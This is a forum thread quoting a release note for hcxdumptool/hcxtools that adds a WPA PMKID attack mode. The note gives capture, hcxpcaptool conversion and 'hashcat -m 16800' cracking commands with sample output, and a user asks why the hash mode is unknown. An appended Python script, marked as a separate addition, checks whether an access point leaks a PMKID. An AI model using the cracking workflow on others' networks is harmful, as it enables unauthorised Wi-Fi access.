07-25-2018, 10:40 PM
(This post was last modified: 07-25-2018, 11:30 PM by strike1953.)
(07-25-2018, 08:44 PM)ZerBea Wrote: Small update on hcxdumptool and hcxtools: moved to v 4.2.0 rc1:
Added a completely new WPA attack mode according to the new hashcat hash modes 16800 and 16801. The attack is performed on the RSN IE (Robust Security Network Information Element) of an EAPOL 1/4 frame.
At this moment we do not know on which vendors and on how many routers this will work. Please test it...
Also hcxdumptool isn't ready for a 100% attack - I'm working on it.
$ hcxpcaptool -h
-z <file> : output PMKID file (hashcat hashmode -m 16800)
-Z <file> : output PMKID file (hashcat hashmode -m 16801)
Advantage:
only 2 packets required
1 associationrequest/reassociationrequest (proberesponse is ok, too)
2 EAPOL 1/4 (M1) with included RSN IE
Remember ap-less attack:
only 2 packets required
1 associationrequest/reassociationrequest (proberequest is ok, too)
2 EAPOL 2/4 (M2) as response to hcxdumptool
Just use hcxdumptool to capture, hcxpcaptool to convert and hashcat to crack
hcxtools update: 4.2.0 rc1
added new attack mode on WPA PMKID
$ hcxpcaptool -z hashfile.16800 pmkidassociationrequest.pcapng
start reading from pmkidassociationrequest.pcapng
summary:
file name....................: pmkidassociationrequest.pcapng
file type....................: pcapng 1.0
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 3
skipped packets..............: 0
packets with FCS.............: 0
association requests.........: 1
association responses........: 1
EAPOL packets................: 1
EAPOL PMKIDs.................: 1
1 PMKID(s) written to hashfile.16800
$ hashcat -m 16800 hashfile.16800 wordlist
example hashes are here:
https://hashcat.net/wiki/doku.php?id=example_hashes
Hashcat -m 16800?????? where?
Unknown hash-type '16800' selected
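A defensive check for the behaviour described in the quoted post, added here as an example that is not part of either post or of hcxtools: it inspects a captured EAPOL 1/4 (M1) frame from your own access point and reports whether it carries a PMKID. The field offsets follow the IEEE 802.11 EAPOL-Key layout; `pmkid_in_m1`, `build_m1` and the sample bytes are constructed for illustration.

```python
import struct

PMKID_KDE_PREFIX = bytes.fromhex("000fac04")  # OUI 00-0F-AC, data type 4 = PMKID
KEY_DATA_LEN_OFFSET = 97  # 4-byte EAPOL header + 93 bytes of fixed key fields
KEY_INFO_ACK, KEY_INFO_MIC = 0x0080, 0x0100


def pmkid_in_m1(eapol: bytes):
    """Return the 16-byte PMKID carried in an EAPOL-Key M1 frame, or None."""
    if len(eapol) < KEY_DATA_LEN_OFFSET + 2 or eapol[1] != 3:  # type 3 = EAPOL-Key
        return None
    (key_info,) = struct.unpack_from(">H", eapol, 5)
    # M1 is the only 4-way handshake message with Ack set and MIC clear.
    if not key_info & KEY_INFO_ACK or key_info & KEY_INFO_MIC:
        return None
    (data_len,) = struct.unpack_from(">H", eapol, KEY_DATA_LEN_OFFSET)
    data = eapol[KEY_DATA_LEN_OFFSET + 2:KEY_DATA_LEN_OFFSET + 2 + data_len]
    if len(data) != data_len:  # truncated capture
        return None
    pos = 0
    while pos + 2 <= len(data):  # walk the key data as id/length/value elements
        elem_id, elem_len = data[pos], data[pos + 1]
        body = data[pos + 2:pos + 2 + elem_len]
        if len(body) < elem_len:
            break
        if elem_id == 0xDD and elem_len == 20 and body[:4] == PMKID_KDE_PREFIX:
            pmkid = body[4:]
            # Assumption: an all-zero value is a placeholder, not a usable PMKID.
            return None if pmkid == bytes(16) else pmkid
        pos += 2 + elem_len
    return None


def build_m1(key_data: bytes, key_info: int = 0x008A) -> bytes:
    """Constructed test frame: EAPOL-Key with zeroed counter/nonce/IV/RSC/MIC."""
    body = struct.pack(">BHH", 2, key_info, 16) + bytes(8 + 32 + 16 + 8 + 8 + 16)
    body += struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body


SAMPLE_PMKID = bytes(range(1, 17))  # constructed value, not from a real network
SAMPLE_KDE = b"\xdd\x14" + PMKID_KDE_PREFIX + SAMPLE_PMKID

if __name__ == "__main__":
    found = pmkid_in_m1(build_m1(SAMPLE_KDE))
    print("M1 carries PMKID:", found.hex() if found else "no")
```

An access point whose M1 frames return `None` here does not give out a PMKID in EAPOL 1/4.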